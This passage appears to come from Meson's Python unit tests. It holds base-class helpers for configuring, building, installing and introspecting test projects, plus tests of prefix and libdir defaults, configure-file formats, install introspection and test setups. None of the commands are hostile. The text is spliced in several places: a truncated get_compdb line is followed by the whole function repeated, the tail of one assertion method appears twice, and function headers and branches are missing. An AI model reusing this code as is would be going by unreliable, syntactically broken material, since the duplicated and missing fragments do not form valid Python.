''' env = get_fake_env() interp = Interpreter(FakeBuild(env), mock=True) astint = AstInterpreter('.', '', '') self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys())) def test_mesondata_is_up_to_date(self): from mesonbuild.mesondata import mesondata err_msg = textwrap.dedent(''' ########################################################### ### mesonbuild.mesondata is not up-to-date ### ### Please regenerate it by running tools/gen_data.py ### ########################################################### ''') root_dir = Path(__file__).resolve().parent mesonbuild_dir = root_dir / 'mesonbuild' data_dirs = mesonbuild_dir.glob('**/data') data_files = [] # type: T.List[T.Tuple(str, str)] for i in data_dirs: for p in i.iterdir(): data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())] from pprint import pprint current_files = set(mesondata.keys()) scanned_files = set([x[0] for x in data_files]) self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n') errors = [] for i in data_files: if mesondata[i[0]].sha256sum != i[1]: errors += [i[0]] self.assertListEqual(errors, [], err_msg + 'Files were changed') class BasePlatformTests(unittest.TestCase): prefix = '/usr' libdir = 'lib' def setUp(self): super().setUp() self.maxDiff = None src_root = os.path.dirname(__file__) src_root = os.path.join(os.getcwd(), src_root) self.src_root = src_root # Get the backend # FIXME: Extract this from argv? 
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja')) self.meson_args = ['--backend=' + self.backend.name] self.meson_native_file = None self.meson_cross_file = None self.meson_command = python_command + [get_meson_script()] self.setup_command = self.meson_command + self.meson_args self.mconf_command = self.meson_command + ['configure'] self.mintro_command = self.meson_command + ['introspect'] self.wrap_command = self.meson_command + ['wrap'] self.rewrite_command = self.meson_command + ['rewrite'] # Backend-specific build commands self.build_command, self.clean_command, self.test_command, self.install_command, \ self.uninstall_command = get_backend_commands(self.backend) # Test directories self.common_test_dir = os.path.join(src_root, 'test cases/common') self.vala_test_dir = os.path.join(src_root, 'test cases/vala') self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks') self.unit_test_dir = os.path.join(src_root, 'test cases/unit') self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite') self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike') # Misc stuff self.orig_env = os.environ.copy() if self.backend is Backend.ninja: self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do'] else: # VS doesn't have a stable output when no changes are done # XCode backend is untested with unit tests, help welcome! 
    def new_builddir(self):
        '''
        Create a fresh temporary build directory and make it the current one
        via change_builddir(). Tracked in self.builddirs for tearDown cleanup.
        '''
        if not is_cygwin():
            # Keep builddirs inside the source tree so that virus scanners
            # don't complain
            newdir = tempfile.mkdtemp(dir=os.getcwd())
        else:
            # But not on Cygwin because that breaks the umask tests. See:
            # https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
            newdir = tempfile.mkdtemp()
        # In case the directory is inside a symlinked directory, find the real
        # path otherwise we might not find the srcdir from inside the builddir.
        newdir = os.path.realpath(newdir)
        self.change_builddir(newdir)
if override_envvars is None: env = None else: env = os.environ.copy() env.update(override_envvars) p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env, universal_newlines=True, cwd=workdir, timeout=60 * 5) print(p.stdout) if p.returncode != 0: if 'MESON_SKIP_TEST' in p.stdout: raise unittest.SkipTest('Project requested skipping.') raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout) return p.stdout def init(self, srcdir, *, extra_args=None, default_args=True, inprocess=False, override_envvars=None, workdir=None): self.assertPathExists(srcdir) if extra_args is None: extra_args = [] if not isinstance(extra_args, list): extra_args = [extra_args] args = [srcdir, self.builddir] if default_args: args += ['--prefix', self.prefix] if self.libdir: args += ['--libdir', self.libdir] if self.meson_native_file: args += ['--native-file', self.meson_native_file] if self.meson_cross_file: args += ['--cross-file', self.meson_cross_file] self.privatedir = os.path.join(self.builddir, 'meson-private') if inprocess: try: (returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args, override_envvars) if 'MESON_SKIP_TEST' in out: raise unittest.SkipTest('Project requested skipping.') if returncode != 0: self._print_meson_log() print('Stdout:\n') print(out) print('Stderr:\n') print(err) raise RuntimeError('Configure failed') except Exception: self._print_meson_log() raise finally: # Close log file to satisfy Windows file locking mesonbuild.mlog.shutdown() mesonbuild.mlog.log_dir = None mesonbuild.mlog.log_file = None else: try: out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir) except unittest.SkipTest: raise unittest.SkipTest('Project requested skipping: ' + srcdir) except Exception: self._print_meson_log() raise return out def build(self, target=None, *, extra_args=None, override_envvars=None): if extra_args is None: extra_args = [] # Add arguments 
for building the target (if specified), # and using the build dir (if required, with VS) args = get_builddir_target_args(self.backend, self.builddir, target) return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars) def clean(self, *, override_envvars=None): dir_args = get_builddir_target_args(self.backend, self.builddir, None) self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars) def run_tests(self, *, inprocess=False, override_envvars=None): if not inprocess: self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars) else: with mock.patch.dict(os.environ, override_envvars): run_mtest_inprocess(['-C', self.builddir]) def install(self, *, use_destdir=True, override_envvars=None): if self.backend is not Backend.ninja: raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name)) if use_destdir: destdir = {'DESTDIR': self.installdir} if override_envvars is None: override_envvars = destdir else: override_envvars.update(destdir) self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars) def uninstall(self, *, override_envvars=None): self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars) def run_target(self, target, *, override_envvars=None): ''' Run a Ninja target while printing the stdout and stderr to stdout, and also return a copy of it ''' return self.build(target=target, override_envvars=override_envvars) def setconf(self, arg, will_build=True): if not isinstance(arg, list): arg = [arg] if will_build: ensure_backend_detects_changes(self.backend) self._run(self.mconf_command + arg + [self.builddir]) def wipe(self): windows_proof_rmtree(self.builddir) def utime(self, f): ensure_backend_detects_changes(self.backend) os.utime(f) def get_compdb(self): if self.backend is not Backend.ninja: raise unittest.SkipTest('Compiler db not available with {} 
    def get_compdb(self):
        '''
        Load and return compile_commands.json from the build dir as a list of
        dicts (ninja backend only). Skips the test if the file is missing.
        '''
        if self.backend is not Backend.ninja:
            raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
        try:
            with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
                contents = json.load(ifile)
        except FileNotFoundError:
            raise unittest.SkipTest('Compiler db not found')
        # If Ninja is using .rsp files, generate them, read their contents, and
        # replace it as the command for all compile commands in the parsed json.
        if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
            # Pretend to build so that the rsp files are generated
            self.build(extra_args=['-d', 'keeprsp', '-n'])
            for each in contents:
                # Extract the actual command from the rsp file
                compiler, rsp = each['command'].split(' @')
                rsp = os.path.join(self.builddir, rsp)
                # Replace the command with its contents
                with open(rsp, 'r', encoding='utf-8') as f:
                    each['command'] = compiler + ' ' + f.read()
        return contents
''' log = self.get_meson_log() prefix = 'Command line:' cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)] return cmds def get_meson_log_sanitychecks(self): ''' Same as above, but for the sanity checks that were run ''' log = self.get_meson_log() prefix = 'Sanity check compiler command line:' cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)] return cmds def introspect(self, args): if isinstance(args, str): args = [args] out = subprocess.check_output(self.mintro_command + args + [self.builddir], universal_newlines=True) return json.loads(out) def introspect_directory(self, directory, args): if isinstance(args, str): args = [args] out = subprocess.check_output(self.mintro_command + args + [directory], universal_newlines=True) try: obj = json.loads(out) except Exception as e: print(out) raise e return obj def assertPathEqual(self, path1, path2): ''' Handles a lot of platform-specific quirks related to paths such as separator, case-sensitivity, etc. ''' self.assertEqual(PurePath(path1), PurePath(path2)) def assertPathListEqual(self, pathlist1, pathlist2): self.assertEqual(len(pathlist1), len(pathlist2)) worklist = list(zip(pathlist1, pathlist2)) for i in worklist: if i[0] is None: self.assertEqual(i[0], i[1]) else: self.assertPathEqual(i[0], i[1]) def assertPathBasenameEqual(self, path, basename): msg = '{!r} does not end with {!r}'.format(path, basename) # We cannot use os.path.basename because it returns '' when the path # ends with '/' for some silly reason. This is not how the UNIX utility # `basename` works. 
    def assertReconfiguredBuildIsNoop(self):
        'Assert that we reconfigured and then there was nothing to do'
        ret = self.build()
        # The reconfigure must actually have happened...
        self.assertIn('The Meson build system', ret)
        # ...but the subsequent build must not have done any work.
        if self.backend is Backend.ninja:
            for line in ret.split('\n'):
                if line in self.no_rebuild_stdout:
                    break
            else:
                raise AssertionError('build was reconfigured, but was not no-op')
        elif self.backend is Backend.vs:
            # Ensure that some target said that no rebuild was done
            # XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
            self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
            self.assertIn('Link:\n All outputs are up-to-date.', ret)
            # Ensure that no targets were built
            self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
            self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
        elif self.backend is Backend.xcode:
            raise unittest.SkipTest('Please help us fix this test on the xcode backend')
        else:
            raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
on the xcode backend')
        else:
            raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))

    def assertRebuiltTarget(self, target):
        # Assert that the most recent build re-linked the given target,
        # using backend-specific build-log heuristics.
        ret = self.build()
        if self.backend is Backend.ninja:
            self.assertIn('Linking target {}'.format(target), ret)
        elif self.backend is Backend.vs:
            # Ensure that this target was rebuilt
            linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
            self.assertRegex(ret, linkre)
        elif self.backend is Backend.xcode:
            raise unittest.SkipTest('Please help us fix this test on the xcode backend')
        else:
            raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))

    @staticmethod
    def get_target_from_filename(filename):
        # Recover a target name from an output filename: drop the extension
        # and any 'lib'/'cyg' shared/static library prefix.
        base = os.path.splitext(filename)[0]
        if base.startswith(('lib', 'cyg')):
            return base[3:]
        return base

    def assertBuildRelinkedOnlyTarget(self, target):
        # Assert that the most recent build re-linked the given target and
        # nothing else.
        ret = self.build()
        if self.backend is Backend.ninja:
            linked_targets = []
            for line in ret.split('\n'):
                if 'Linking target' in line:
                    fname = line.rsplit('target ')[-1]
                    linked_targets.append(self.get_target_from_filename(fname))
            self.assertEqual(linked_targets, [target])
        elif self.backend is Backend.vs:
            # Ensure that this target was rebuilt
            linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
            matches = linkre.findall(ret)
            self.assertEqual(len(matches), 1, msg=matches)
            self.assertEqual(self.get_target_from_filename(matches[0]), target)
        elif self.backend is Backend.xcode:
            raise unittest.SkipTest('Please help us fix this test on the xcode backend')
        else:
            raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))

    def assertPathExists(self, path):
        # Assert that the given filesystem path exists.
        m = 'Path {!r} should exist'.format(path)
        self.assertTrue(os.path.exists(path), msg=m)

    def assertPathDoesNotExist(self, path):
        # Assert that the given filesystem path does not exist.
        m = 'Path {!r} should not exist'.format(path)
        self.assertFalse(os.path.exists(path), msg=m)


class AllPlatformTests(BasePlatformTests):
    '''
    Tests that should run on all platforms
    '''

    def test_default_options_prefix(self):
        '''
        Tests that setting a prefix in default_options in project() works.
        Can't be an ordinary test because we pass --prefix to meson there.
        https://github.com/mesonbuild/meson/issues/1349
        '''
        testdir = os.path.join(self.common_test_dir, '88 default options')
        self.init(testdir, default_args=False, inprocess=True)
        opts = self.introspect('--buildoptions')
        for opt in opts:
            if opt['name'] == 'prefix':
                prefix = opt['value']
                break
        else:
            # NOTE(review): self.fail() already raises; the extra 'raise' is
            # redundant but harmless.
            raise self.fail('Did not find option "prefix"')
        self.assertEqual(prefix, '/absoluteprefix')

    def test_do_conf_file_preserve_newlines(self):
        # do_conf_file() must preserve the input's newline style
        # (LF vs CRLF) in the generated output.

        def conf_file(in_data, confdata):
            # Round-trip in_data through do_conf_file() via temp files and
            # return the raw output text (decoded, newlines untouched).
            with temp_filename() as fin:
                with open(fin, 'wb') as fobj:
                    fobj.write(in_data.encode('utf-8'))
                with temp_filename() as fout:
                    mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
                    with open(fout, 'rb') as fobj:
                        return fobj.read().decode('utf-8')

        confdata = {'VAR': ('foo', 'bar')}
        self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
        self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')

    def test_do_conf_file_by_format(self):
        # Exercise do_conf_str() for each supported variable format
        # ('meson', 'cmake', 'cmake@') including its error cases.

        def conf_str(in_data, confdata, vformat):
            # Run do_conf_str() on a list of lines and join the result.
            (result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat)
            return '\n'.join(result)

        def check_formats(confdata, result):
            # The same confdata must produce the same output in all three
            # supported #define formats.
            self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result)
            self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result)
            self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result)

        confdata = ConfigurationData()
        # Key error as they do not exist
        check_formats(confdata, '/* #undef VAR */\n')

        # Check boolean
        confdata.values = {'VAR': (False, 'description')}
        check_formats(confdata, '#undef VAR\n')
        confdata.values = {'VAR': (True, 'description')}
        check_formats(confdata, '#define VAR\n')

        # Check string
        confdata.values = {'VAR': ('value', 'description')}
        check_formats(confdata, '#define VAR value\n')

        # Check integer
        confdata.values = {'VAR': (10, 'description')}
        check_formats(confdata, '#define VAR 10\n')

        # Check multiple string with cmake formats
        confdata.values = {'VAR': ('value', 'description')}
        self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n')
        self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value')
        self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n')
        self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value')

        # Handles meson format exceptions
        # Unknown format
        self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format')
        # More than 2 params in mesondefine
        self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson')
        # Mismatched line with format
        self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson')
        self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake')
        self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@')
        # Dict value in confdata
        confdata.values = {'VAR': (['value'], 'description')}
        self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson')

    def test_absolute_prefix_libdir(self):
        '''
        Tests that setting absolute paths for --prefix and --libdir work. Can't
        be an ordinary test because these are set via the command-line.
        https://github.com/mesonbuild/meson/issues/1341
        https://github.com/mesonbuild/meson/issues/1345
        '''
        testdir = os.path.join(self.common_test_dir, '88 default options')
        # on Windows, /someabs is *not* an absolute path
        prefix = 'x:/someabs' if is_windows() else '/someabs'
        libdir = 'libdir'
        extra_args = ['--prefix=' + prefix,
                      # This can just be a relative path, but we want to test
                      # that passing this as an absolute path also works
                      '--libdir=' + prefix + '/' + libdir]
        self.init(testdir, extra_args=extra_args, default_args=False)
        opts = self.introspect('--buildoptions')
        for opt in opts:
            if opt['name'] == 'prefix':
                self.assertEqual(prefix, opt['value'])
            elif opt['name'] == 'libdir':
                self.assertEqual(libdir, opt['value'])

    def test_libdir_must_be_inside_prefix(self):
        '''
        Tests that libdir is forced to be inside prefix no matter how it is set.
        Must be a unit test for obvious reasons.
        '''
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        # libdir being inside prefix is ok
        if is_windows():
            args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
        else:
            args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
        self.init(testdir, extra_args=args)
        self.wipe()
        # libdir not being inside prefix is not ok
        if is_windows():
            args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
        else:
            args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
        self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
        self.wipe()
        # libdir must be inside prefix even when set via mesonconf
        self.init(testdir)
        if is_windows():
            self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
        else:
            self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)

    def test_prefix_dependent_defaults(self):
        '''
        Tests that configured directory paths are set to prefix dependent
        defaults.
        '''
        testdir = os.path.join(self.common_test_dir, '1 trivial')
        expected = {
            '/opt': {'prefix': '/opt',
                     'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
                     'infodir': 'share/info',
                     'libexecdir': 'libexec', 'localedir': 'share/locale',
                     'localstatedir': 'var', 'mandir': 'share/man',
                     'sbindir': 'sbin', 'sharedstatedir': 'com',
                     'sysconfdir': 'etc'},
            '/usr': {'prefix': '/usr',
                     'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
                     'infodir': 'share/info',
                     'libexecdir': 'libexec', 'localedir': 'share/locale',
                     'localstatedir': '/var', 'mandir': 'share/man',
                     'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
                     'sysconfdir': '/etc'},
            '/usr/local': {'prefix': '/usr/local',
                           'bindir': 'bin', 'datadir': 'share',
                           'includedir': 'include', 'infodir': 'share/info',
                           'libexecdir': 'libexec',
                           'localedir': 'share/locale',
                           'localstatedir': '/var/local', 'mandir': 'share/man',
                           'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
                           'sysconfdir': 'etc'},
            # N.B. We don't check 'libdir' as it's platform dependent, see
            # default_libdir():
        }

        if mesonbuild.mesonlib.default_prefix() == '/usr/local':
            expected[None] = expected['/usr/local']

        for prefix in expected:
            args = []
            if prefix:
                args += ['--prefix', prefix]
            self.init(testdir, extra_args=args, default_args=False)
            opts = self.introspect('--buildoptions')
            for opt in opts:
                name = opt['name']
                value = opt['value']
                if name in expected[prefix]:
                    self.assertEqual(value, expected[prefix][name])
            self.wipe()

    def test_default_options_prefix_dependent_defaults(self):
        '''
        Tests that setting a prefix in default_options in project() sets prefix
        dependent defaults for other options, and that those defaults can
        be overridden in default_options or by the command line.
        '''
        testdir = os.path.join(self.common_test_dir, '164 default options prefix dependent defaults')
        expected = {
            '':
            {'prefix':         '/usr',
             'sysconfdir':     '/etc',
             'localstatedir':  '/var',
             'sharedstatedir': '/sharedstate'},
            '--prefix=/usr':
            {'prefix':         '/usr',
             'sysconfdir':     '/etc',
             'localstatedir':  '/var',
             'sharedstatedir': '/sharedstate'},
            '--sharedstatedir=/var/state':
            {'prefix':         '/usr',
             'sysconfdir':     '/etc',
             'localstatedir':  '/var',
             'sharedstatedir': '/var/state'},
            '--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
            {'prefix':         '/usr',
             'sysconfdir':     'sysconf',
             'localstatedir':  '/var',
             'sharedstatedir': '/var/state'},
        }
        for args in expected:
            self.init(testdir, extra_args=args.split(), default_args=False)
            opts = self.introspect('--buildoptions')
            for opt in opts:
                name = opt['name']
                value = opt['value']
                if name in expected[args]:
                    self.assertEqual(value, expected[args][name])
            self.wipe()

    def test_clike_get_library_dirs(self):
        # Every library dir reported by a C-like compiler must be an
        # existing absolute directory.
        env = get_fake_env()
        cc = env.detect_c_compiler(MachineChoice.HOST)
        for d in cc.get_library_dirs(env):
            self.assertTrue(os.path.exists(d))
            self.assertTrue(os.path.isdir(d))
            self.assertTrue(os.path.isabs(d))

    def test_static_library_overwrite(self):
        '''
        Tests that static libraries are never appended to, always overwritten.
        Has to be a unit test because this involves building a project,
        reconfiguring, and building it again so that `ar` is run twice on the
        same static library.
        https://github.com/mesonbuild/meson/issues/1355
        '''
        testdir = os.path.join(self.common_test_dir, '3 static')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        static_linker = env.detect_static_linker(cc)
        if is_windows():
            raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
        if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
            raise unittest.SkipTest('static linker is not `ar`')
        # Configure
        self.init(testdir)
        # Get name of static library
        targets = self.introspect('--targets')
        self.assertEqual(len(targets), 1)
        libname = targets[0]['filename'][0]
        # Build and get contents of static library
        self.build()
        before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
        # Filter out non-object-file contents
        before = [f for f in before if f.endswith(('.o', '.obj'))]
        # Static library should contain only one object
        self.assertEqual(len(before), 1, msg=before)
        # Change the source to be built into the static library
        self.setconf('-Dsource=libfile2.c')
        self.build()
        after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
        # Filter out non-object-file contents
        after = [f for f in after if f.endswith(('.o', '.obj'))]
        # Static library should contain only one object
        self.assertEqual(len(after), 1, msg=after)
        # and the object must have changed
        self.assertNotEqual(before, after)

    def test_static_compile_order(self):
        '''
        Test that the order of files in a compiler command-line while compiling
        and linking statically is deterministic. This can't be an ordinary test
        case because we need to inspect the compiler database.
        https://github.com/mesonbuild/meson/pull/951
        '''
        testdir = os.path.join(self.common_test_dir, '5 linkstatic')
        self.init(testdir)
        compdb = self.get_compdb()
        # Rules will get written out in this order
        self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
        self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
        self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
        self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
        # FIXME: We don't have access to the linker command

    def test_run_target_files_path(self):
        '''
        Test that run_targets are run from the correct directory
        https://github.com/mesonbuild/meson/issues/957
        '''
        testdir = os.path.join(self.common_test_dir, '52 run target')
        self.init(testdir)
        self.run_target('check_exists')

    def test_install_introspection(self):
        '''
        Tests that the Meson introspection API exposes install filenames correctly
        https://github.com/mesonbuild/meson/issues/829
        '''
        if self.backend is not Backend.ninja:
            raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
        testdir = os.path.join(self.common_test_dir, '8 install')
        self.init(testdir)
        intro = self.introspect('--targets')
        if intro[0]['type'] == 'executable':
            intro = intro[::-1]
        self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
        self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])

    def test_install_subdir_introspection(self):
        '''
        Test that the Meson introspection API also contains subdir install information
        https://github.com/mesonbuild/meson/issues/5556
        '''
        testdir = os.path.join(self.common_test_dir, '60 install subdir')
        self.init(testdir)
        intro = self.introspect('--installed')
        expected = {
            'sub2': 'share/sub2',
            'subdir/sub1': 'share/sub1',
            'subdir/sub_elided': 'share',
            'sub1': 'share/sub1',
            'sub/sub1': 'share/sub1',
            'sub_elided': 'share',
            'nested_elided/sub': 'share',
        }

        self.assertEqual(len(intro), len(expected))

        # Convert expected to PurePath
        expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
        intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}

        for src, dst in expected_converted.items():
            self.assertIn(src, intro_converted)
            self.assertEqual(dst, intro_converted[src])

    def test_install_introspection_multiple_outputs(self):
        '''
        Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
        https://github.com/mesonbuild/meson/pull/4555

        Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
        TODO Change the format to a list officially in a followup PR
        '''
        if self.backend is not Backend.ninja:
            raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
        testdir = os.path.join(self.common_test_dir, '141 custom target multiple outputs')
        self.init(testdir)
        intro = self.introspect('--targets')
        if intro[0]['type'] == 'executable':
            intro = intro[::-1]
        self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
        self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
        self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
        self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])

    def test_install_log_content(self):
        '''
        Tests that the install-log.txt is consistent with the installed files and directories.
        Specifically checks that the log file only contains one entry per file/directory.
        https://github.com/mesonbuild/meson/issues/4499
        '''
        testdir = os.path.join(self.common_test_dir, '60 install subdir')
        self.init(testdir)
        self.install()
        installpath = Path(self.installdir)
        # Find installed files and directories
        expected = {installpath: 0}
        for name in installpath.rglob('*'):
            expected[name] = 0
        # Find logged files and directories
        with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
            logged = list(map(lambda l: Path(l.strip()),
                              filter(lambda l: not l.startswith('#'), f.readlines())))
        for name in logged:
            self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
            expected[name] += 1

        for name, count in expected.items():
            self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
            self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))

    def test_uninstall(self):
        # install followed by uninstall must remove the installed binary.
        exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
        testdir = os.path.join(self.common_test_dir, '8 install')
        self.init(testdir)
        self.assertPathDoesNotExist(exename)
        self.install()
        self.assertPathExists(exename)
        self.uninstall()
        self.assertPathDoesNotExist(exename)

    def test_forcefallback(self):
        # --wrap-mode=forcefallback must build and test using the fallback
        # subproject.
        testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
        self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
        self.build()
        self.run_tests()

    def test_force_fallback_for(self):
        # --force-fallback-for=<deps> must force the fallback only for the
        # named dependencies.
        testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
        self.init(testdir, extra_args=['--force-fallback-for=zlib,foo'])
        self.build()
        self.run_tests()

    def test_env_ops_dont_stack(self):
        '''
        Test that env ops prepend/append do not stack, and that this usage issues a warning
        '''
        testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
        out = self.init(testdir)
        self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
        self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
        self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
        self.run_tests()

    def test_testsetups(self):
        # Test setups (--setup=...) must apply their env/wrapper settings,
        # shown here with a valgrind wrapper setup.
        if not shutil.which('valgrind'):
            raise unittest.SkipTest('Valgrind not installed.')
        testdir = os.path.join(self.unit_test_dir, '2 testsetups')
        self.init(testdir)
        self.build()
        # Run tests without setup
        self.run_tests()
        with open(os.path.join(self.logdir, 'testlog.txt')) as f:
            basic_log = f.read()
        # Run buggy test with setup that has env that will make it fail
        self.assertRaises(subprocess.CalledProcessError,
                          self._run, self.mtest_command + ['--setup=valgrind'])
        with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
            vg_log = f.read()
        self.assertFalse('TEST_ENV is set' in basic_log)
        self.assertFalse('Memcheck' in basic_log)
        self.assertTrue('TEST_ENV is set' in vg_log)
        self.assertTrue('Memcheck' in vg_log)
        # Run buggy test with setup without env that will pass
        self._run(self.mtest_command + ['--setup=wrapper'])
        # Setup with no properties works
        self._run(self.mtest_command + ['--setup=empty'])
        # Setup with only env works
        self._run(self.mtest_command + ['--setup=onlyenv'])
        self._run(self.mtest_command + ['--setup=onlyenv2'])
        self._run(self.mtest_command + ['--setup=onlyenv3'])
        # Setup with only a timeout works
        self._run(self.mtest_command + ['--setup=timeout'])

    def test_testsetup_selection(self):
        # Setups may be namespaced per (sub)project; selection must resolve
        # plain and project-qualified names correctly.
        testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
        self.init(testdir)
        self.build()

        # Run tests without setup
        self.run_tests()

        self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
        self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])

        self._run(self.mtest_command + ['--setup=worksforall'])
        self._run(self.mtest_command + ['--setup=main:worksforall'])

        self.assertRaises(subprocess.CalledProcessError, self._run,
                          self.mtest_command + ['--setup=onlyinbar'])
        self.assertRaises(subprocess.CalledProcessError, self._run,
                          self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
        self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
        self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
        self.assertRaises(subprocess.CalledProcessError, self._run,
                          self.mtest_command + ['--setup=foo:onlyinbar'])
        self.assertRaises(subprocess.CalledProcessError, self._run,
                          self.mtest_command + ['--setup=main:onlyinbar'])

    def test_testsetup_default(self):
        # A setup marked as default must be used when no --setup is given,
        # and explicit setups must still override it.
        testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
        self.init(testdir)
        self.build()

        # Run tests without --setup will cause the default setup to be used
        self.run_tests()
